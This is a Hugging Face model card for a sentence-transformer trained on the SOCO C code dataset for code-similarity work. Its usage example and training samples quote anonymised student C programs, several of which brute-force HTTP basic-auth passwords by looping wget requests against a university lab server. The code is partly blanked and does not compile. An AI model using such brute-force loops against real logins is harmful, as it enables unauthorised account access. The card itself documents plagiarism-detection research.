SentenceTransformer based on microsoft/unixcoder-base-unimodal

This is a sentence-transformers model finetuned from microsoft/unixcoder-base-unimodal. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.

Model Details

Model Description

  • Model Type: Sentence Transformer
  • Base model: microsoft/unixcoder-base-unimodal
  • Maximum Sequence Length: 512 tokens
  • Output Dimensionality: 768 dimensions
  • Similarity Function: Cosine Similarity

Model Sources

Full Model Architecture

SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)

Usage

Direct Usage (Sentence Transformers)

First install the Sentence Transformers library:

pip install -U sentence-transformers

Then you can load this model and run inference.

from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-C-UniXcoder-ST-0")
# Run inference
sentences = [
    '\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n#define MAX_SIZE 255\n\n\n\nint genchkpwd(char *chararray,char *passwd)\n {\n   int i,j,k,success;\n   char str1[MAX_SIZE],str2[MAX_SIZE],tempstr[MAX_SIZE];\n   \n   \n   strcpy(str1,"wget --http-user= --http-passwd=");\n   strcpy(str2," http://sec-crack.cs.rmit.edu./SEC/2/");\n   strcpy(tempstr,"");\n\n\n\n   for(i=0;i<52;i++)\n    {\n      passwd[0]= chararray[i];\n      strcat(tempstr,str1);\n      strcat(tempstr,passwd);\n      strcat(tempstr,str2);\n      printf("SENDING REQUEST AS %s\\n",tempstr);\n      success=system (tempstr);\n      if (success==0)\n       return 1;\n      else\n       strcpy(tempstr,""); \n       strcpy(passwd,"");\n     }     \n\n\n\n   for(i=0;i<52;i++)\n    {\n      passwd[0]= chararray[i];\n      for(j=0;j<52;j++)\n       {\n         passwd[1]=chararray[j];\n\t strcat(tempstr,str1);\n         strcat(tempstr,passwd);\n         strcat(tempstr,str2);\n         printf("SENDING REQUEST AS %s\\n",tempstr);\n         success=system (tempstr);\n         if (success==0)\n           return 1;\n         else\n         strcpy(tempstr,""); \n         \n      }     \n    }\n\n\n\n   for(i=0;i<52;i++)\n    {\n      passwd[0]= chararray[i];\n      for(j=0;j<52;j++)\n       {\n         passwd[1]=chararray[j];\n         for(k=0;k<52;k++)\n\t  {\n\t    passwd[2]=chararray[k];\n\t    strcat(tempstr,str1);\n            strcat(tempstr,passwd);\n            strcat(tempstr,str2);\n            printf("SENDING REQUEST AS %s\\n",tempstr);\n            success=system (tempstr);\n            if (success==0)\n              return 1;\n            else\n              strcpy(tempstr,""); \n\t  }    \n       }     \n     }\n   return 1;\n  }  \n\nint  (int argc, char *argv[])\n {\n     char chararray[52],passwd[3];\n     int i,success;\n     char ch=\'a\';\n\n\n     \n     int , end;    \n      = time();\t \n\n     for (i=0;i<3;i++)\n      {\n          passwd[i]=\'\\0\';\n      }  \n\n\n\n     for (i=0;i<26;i++)\n      {\n          chararray[i]= ch;\n\t  ch++;\n      }\n      ch=\'A\';  \n     for (i=26;i<52;i++)\n      {\n          chararray[i]= ch;\n\t  ch++;\n      }\n\n\n\n      success=genchkpwd(chararray,passwd);\n      printf("\\nPassword is %s\\n",passwd); \n      getpid();\n      end = time(); \n      printf("Time required = %lld msec\\n",(end-)/());\n     return (EXIT_SUCCESS);\n  }\n     \n\t   \n\t  \t\n',
    '\n\n#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <sys/time.h>\n#include<string.h>\nint ()\n{\nchar a[100],c[100],c1[100],c2[100],m[50];\nchar b[53]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n\nint i,j,k,count=0;\nint  total_time,start_time,end_time;\nstart_time = time();\n\n\nfor(i=0;i<52;i++)\n{\n\t\n\tm[0]=b[i];\n\tm[1]=\'\\0\';\n\tstrcpy(c,m);\n\tprintf("%s \\n",c);\n\tfor(j=0;j<52;j++)\n\t{\n\tm[0]=b[j];\n\tm[1]=\'\\0\';\n\tstrcpy(c1,c);\n\tstrcat(c1,m);\n\tprintf("%s \\n",c1);\n\tfor(k=0;k<52;k++)\n\t{\n\t\tcount++;\n\t\tprintf("ATTEMPT :%d\\n",count);\n\t\t\n\t\tm[0]=b[k];\n\t\tm[1]=\'\\0\';\n\t\tstrcpy(c2,c1);\n\t\tstrcat(c2,m);\n\nstrcpy(a,"wget http://sec-crack.cs.rmit.edu./SEC/2/index.php --http-user= --http-passwd=");\n\n\t\tstrcat(a,c2);\t\t\n\t\tif(system(a)==0)\n\t\t{\n\t\tprintf("Congratulations!!!!BruteForce Attack Successful\\n");\n\t\tprintf("***********************************************\\n");\n\t\tprintf("The Password is %s\\n",c2);\n\t\tprintf("The Request sent is %s\\n",a); \n                end_time = time();\n                total_time = (end_time -start_time);\n                total_time /= 1000000000.0;\n                printf("The Time Taken is : %llds\\n",total_time);\n\t\texit(1);\n\t\t}\n\t\t\n\t\t\n\t\t\n\t\t\n\t}\n\n}\n}\nreturn 0;\n}\n',
    '#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<ctype.h>\n#include<time.h>\n\nint ()\n{\n\n int m,n,o,i;\n char URL[255];\n char v[3];\n char temp1[100];\nchar temp2[100];\nchar temp3[250];\nchar [53]={\'a\',\'A\',\'b\',\'B\',\'c\',\'C\',\'d\',\'D\',\'e\',\'E\',\'f\',\'F\',\'g\',\'G\',\'h\',\'H\',\'i\',\'I\',\'j\',\'J\',\'k\',\'K\',\'l\',\'L\',\'m\',\'M\',\'n\',\'N\',\'o\',\'O\',\'p\',\'P\',\'q\',\'Q\',\'r\',\'R\',\'s\',\'S\',\'t\',\'T\',\'u\',\'U\',\'v\',\'V\',\'w\',\'W\',\'x\',\'X\',\'y\',\'Y\',\'z\',\'Z\'};\ntime_t u1,u2;\n\n  (void) time(&u1); \n strcpy(temp1,"wget --http-user= --http-passwd=");\n strcpy(temp2," http://sec-crack.cs.rmit.edu./SEC/2/index.php");\n \n for(m=0;m<=51;m++)\n {\n   v[0]=[m]; \n   v[1]=\'\\0\';\n   v[2]=\'\\0\';\n   strcpy(URL,v); \n   printf("\\nTesting with password %s\\n",URL);\n   strcat(temp3,temp1);\n   strcat(temp3,URL);\n   strcat(temp3,temp2);\n   printf("\\nSending the  %s\\n",temp3);\n   i=system(temp3); \n   \t\n\tif(i==0)\n   \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken  crack the password is  %d  second\\n\\n",(int)(u2-u1));\n     \t exit(0);\n   \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n  for(n=0;n<=51;n++)\n  {\n   v[0]=[m]; \n   v[1]=[n];\n   v[2]=\'\\0\';\n   strcpy(URL,v); \n   printf("\\nTesting with password %s\\n",URL);\n   strcat(temp3,temp1);\n   strcat(temp3,URL);\n   strcat(temp3,temp2);\n   printf("\\nSending the  %s\\n",temp3);\n   i=system(temp3);\n   \t\n\tif(i==0)\n   \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken  crack the password is  %d  second\\n\\n",(int)(u2-u1));\n     \t exit(0);\n   \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n   for(o=0;o<=51;o++)\n   { \n   v[0]=[m]; \n   v[1]=[n];\n   v[2]=[o];\n   strcpy(URL,v); \n   printf("\\nTesting with password %s\\n",URL);\n   strcat(temp3,temp1);\n   strcat(temp3,URL);\n   strcat(temp3,temp2);\n   printf("\\nSending the  %s\\n",temp3);\n   i=system(temp3);\n   \t\n\tif(i==0)\n   \t{\n\t (void) time(&u2); \n\t printf("\\n The password is %s\\n",URL);\n\t printf("\\n\\nThe time_var taken  crack the password is  %d  second\\n\\n",(int)(u2-u1));\n     \t exit(0);\n   \t} \n\telse\n\t{\n\tstrcpy(temp3,"");\n\t}\n   \n   \n   }\n  }\n }  \n  \n}  \n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.9111, 0.9288],
#         [0.9111, 1.0000, 0.9562],
#         [0.9288, 0.9562, 1.0000]])

Training Details

Training Dataset

Unnamed Dataset

  • Size: 3,081 training samples
  • Columns: sentence_0, sentence_1, and label
  • Approximate statistics based on the first 1000 samples:
    sentence_0 sentence_1 label
    type string string int
    details
    • min: 177 tokens
    • mean: 436.43 tokens
    • max: 512 tokens
    • min: 177 tokens
    • mean: 421.53 tokens
    • max: 512 tokens
    • 0: ~99.20%
    • 1: ~0.80%
  • Samples:
    sentence_0 sentence_1 label






    #include
    #include
    #include
    #include
    #include

    #define MSG_FILE "msg"
    #define EMAIL_TO "@cs.rmit.edu."
    #define TRUE 1
    #define FALSE 0


    void genLog(char *logFile, const char *URL);
    void getPage(const char URL, const char fname);
    int getCurTime();
    int logDiff(const char logFile, int time);
    int isFileExist(const char fname);
    void sendMail(const char
    emailTo, const char
    subject, const char
    msgFile
    , const char
    log);

    int (int argc, char **argv)
    {
    int time_var;
    char *URL;
    int upTime = 0;
    char logFile[256];
    int logSent = FALSE;
    char subject[256];

    if (argc != 3)
    {
    fprintf(stderr, "\nUsage: ./WatchDog URL timeIntervalInSec\n");
    exit(1);
    }
    else
    {
    time_var = atoi(argv[2]);

    URL = malloc(strlen(argv[1]));

    if (URL)
    {
    for (;;)
    {
    if (((int)difftime(upTime, getCurTime()) % time_var == 0)
    && !logSent)
    {
    strncpy(URL, argv[1], strlen(argv[1]));
    genLog(logFile, URL);
    ...
    #include
    #include
    #include
    #include
    #include
    #include
    #include



    char* joinMe(char* t, char* t2)
    {
    char* result;
    int length = 0;
    int j = 0;
    int counter = 0;

    length = strlen(t) + strlen(t2) + 1;

    result = malloc(sizeof(char) * length);


    for(j = 0; j {
    result[j] = t[j];
    }


    for(j = strlen(t); j {
    result[j] = t2[counter];
    counter++;
    }


    result[length-1] = '\0';

    return result;
    }


    void check(char** smallcmd)
    {
    int pid = 0;
    int status;


    if( (pid = fork()) == 0)
    {

    execvp(smallcmd[0],smallcmd);
    }
    else
    {

    while(wait(&status) != pid);
    }
    }

    int (void)
    {
    int i = 0, j = 0, k = 0;
    char** smallcmd;
    int count = 0;
    FILE *myFile,*myFile2,myFile3;
    int compare1;
    char
    myString;
    int length = 0;
    int start1, end1;


    myString = malloc(sizeof(char) * 100);
    smallcmd = malloc(sizeof(char *) * 8);

    smallcmd[0] = "/usr/local//wget";

    smallcm...
    0






    #include
    #include
    #include
    #include
    #include

    #define MSG_FILE "msg"
    #define EMAIL_TO "@cs.rmit.edu."
    #define TRUE 1
    #define FALSE 0


    void genLog(char *logFile, const char *URL);
    void getPage(const char URL, const char fname);
    int getCurTime();
    int logDiff(const char logFile, int time);
    int isFileExist(const char fname);
    void sendMail(const char
    emailTo, const char
    subject, const char
    msgFile
    , const char
    log);

    int (int argc, char **argv)
    {
    int time_var;
    char *URL;
    int upTime = 0;
    char logFile[256];
    int logSent = FALSE;
    char subject[256];

    if (argc != 3)
    {
    fprintf(stderr, "\nUsage: ./WatchDog URL timeIntervalInSec\n");
    exit(1);
    }
    else
    {
    time_var = atoi(argv[2]);

    URL = malloc(strlen(argv[1]));

    if (URL)
    {
    for (;;)
    {
    if (((int)difftime(upTime, getCurTime()) % time_var == 0)
    && !logSent)
    {
    strncpy(URL, argv[1], strlen(argv[1]));
    genLog(logFile, URL);
    ...
    #include
    #include
    #include
    #include
    #include

    int ()
    {
    char lc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    char uc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    char gc[53]="abcdefghijlmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    int a=0,b=0,c=0,d,e,count=0;
    char [100],temp1[100],temp2[100],temp3[100],temp4[10],temp5[50],p[100],q[50],r[50];
    char result,result1,result2,mx[100],mx1,mx2,mx3,mx4;

    int ,end,t;
    = time();
    while(sizeof(lc)!=52)
    {
    temp2[0]=lc[d];
    temp2[1]='\0';
    d=d+1;
    strcpy(p,temp2);

    while(sizeof(uc)!=52)
    {
    temp3[0]=uc[b];
    temp3[1]='\0';
    b=b+1;
    strcpy(q,p);
    strcat(q,temp3);
    for(e=0;e<52;e++)
    {
    temp1[0]=gc[e];
    temp1[1]='\0';
    strcpy(r,q);
    strcat(r,temp1);
    strcpy(mx,"wget http://sec-crack.cs.rmit.edu./SEC/2 --http-user= --http-passwd=");
    strcat(mx,r);
    printf("temp3=%s\n",mx);
    if(sy...
    0
    #include
    #include
    #include
    #define TRUE 0
    ()
    {
    FILE fp;
    system("rmdir ./www.cs.rmit.edu.");
    char chk[1];
    strcpy(chk,"n");
    while(1)
    {

    system("wget -p http://www.cs.rmit.edu./students/");

    system("md5sum ./www.cs.rmit.edu./images/
    .* > ./www.cs.rmit.edu./text1.txt");


    if (strcmp(chk,"n")==0)
    {
    system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt");
    system("mkdir ./");

    system("mv ./www.cs.rmit.edu./students/index.html ./");
    }
    else
    {


    system(" diff ./www.cs.rmit.edu./students/index.html .//index.html
    mail @cs.rmit.edu. ");
    system(" diff ./www.cs.rmit.edu./text1.txt ./text2.txt
    mail @cs.rmit.edu. ");
    system("mv ./www.cs.rmit.edu./students/index.html ./");
    system("mv ./www.cs.rmit.edu./text1.txt ./text2.txt");
    }
    sleep(86400);
    strcpy(chk,"y");

    }
    }


  • Loss: BatchAllTripletLoss

Training Hyperparameters

Non-Default Hyperparameters

  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • num_train_epochs: 1
  • fp16: True
  • multi_dataset_batch_sampler: round_robin

All Hyperparameters

Click to expand
  • overwrite_output_dir: False
  • do_predict: False
  • eval_strategy: no
  • prediction_loss_only: True
  • per_device_train_batch_size: 16
  • per_device_eval_batch_size: 16
  • per_gpu_train_batch_size: None
  • per_gpu_eval_batch_size: None
  • gradient_accumulation_steps: 1
  • eval_accumulation_steps: None
  • torch_empty_cache_steps: None
  • learning_rate: 5e-05
  • weight_decay: 0.0
  • adam_beta1: 0.9
  • adam_beta2: 0.999
  • adam_epsilon: 1e-08
  • max_grad_norm: 1
  • num_train_epochs: 1
  • max_steps: -1
  • lr_scheduler_type: linear
  • lr_scheduler_kwargs: {}
  • warmup_ratio: 0.0
  • warmup_steps: 0
  • log_level: passive
  • log_level_replica: warning
  • log_on_each_node: True
  • logging_nan_inf_filter: True
  • save_safetensors: True
  • save_on_each_node: False
  • save_only_model: False
  • restore_callback_states_from_checkpoint: False
  • no_cuda: False
  • use_cpu: False
  • use_mps_device: False
  • seed: 42
  • data_seed: None
  • jit_mode_eval: False
  • use_ipex: False
  • bf16: False
  • fp16: True
  • fp16_opt_level: O1
  • half_precision_backend: auto
  • bf16_full_eval: False
  • fp16_full_eval: False
  • tf32: None
  • local_rank: 0
  • ddp_backend: None
  • tpu_num_cores: None
  • tpu_metrics_debug: False
  • debug: []
  • dataloader_drop_last: False
  • dataloader_num_workers: 0
  • dataloader_prefetch_factor: None
  • past_index: -1
  • disable_tqdm: False
  • remove_unused_columns: True
  • label_names: None
  • load_best_model_at_end: False
  • ignore_data_skip: False
  • fsdp: []
  • fsdp_min_num_params: 0
  • fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
  • fsdp_transformer_layer_cls_to_wrap: None
  • accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
  • deepspeed: None
  • label_smoothing_factor: 0.0
  • optim: adamw_torch
  • optim_args: None
  • adafactor: False
  • group_by_length: False
  • length_column_name: length
  • ddp_find_unused_parameters: None
  • ddp_bucket_cap_mb: None
  • ddp_broadcast_buffers: False
  • dataloader_pin_memory: True
  • dataloader_persistent_workers: False
  • skip_memory_metrics: True
  • use_legacy_prediction_loop: False
  • push_to_hub: False
  • resume_from_checkpoint: None
  • hub_model_id: None
  • hub_strategy: every_save
  • hub_private_repo: None
  • hub_always_push: False
  • gradient_checkpointing: False
  • gradient_checkpointing_kwargs: None
  • include_inputs_for_metrics: False
  • include_for_metrics: []
  • eval_do_concat_batches: True
  • fp16_backend: auto
  • push_to_hub_model_id: None
  • push_to_hub_organization: None
  • mp_parameters:
  • auto_find_batch_size: False
  • full_determinism: False
  • torchdynamo: None
  • ray_scope: last
  • ddp_timeout: 1800
  • torch_compile: False
  • torch_compile_backend: None
  • torch_compile_mode: None
  • include_tokens_per_second: False
  • include_num_input_tokens_seen: False
  • neftune_noise_alpha: None
  • optim_target_modules: None
  • batch_eval_metrics: False
  • eval_on_start: False
  • use_liger_kernel: False
  • eval_use_gather_object: False
  • average_tokens_across_devices: False
  • prompts: None
  • batch_sampler: batch_sampler
  • multi_dataset_batch_sampler: round_robin
  • router_mapping: {}
  • learning_rate_mapping: {}

Framework Versions

  • Python: 3.11.13
  • Sentence Transformers: 5.0.0
  • Transformers: 4.52.4
  • PyTorch: 2.6.0+cu124
  • Accelerate: 1.8.1
  • Datasets: 3.6.0
  • Tokenizers: 0.21.2

Citation

BibTeX

Sentence Transformers

@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}

BatchAllTripletLoss

@misc{hermans2017defense,
    title={In Defense of the Triplet Loss for Person Re-Identification},
    author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
    year={2017},
    eprint={1703.07737},
    archivePrefix={arXiv},
    primaryClass={cs.CV}
}
Downloads last month
1
Safetensors
Model size
125M params
Tensor type
F32
·
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Model tree for buelfhood/SOCO-C-UniXcoder-ST-0

Finetuned
(8)
this model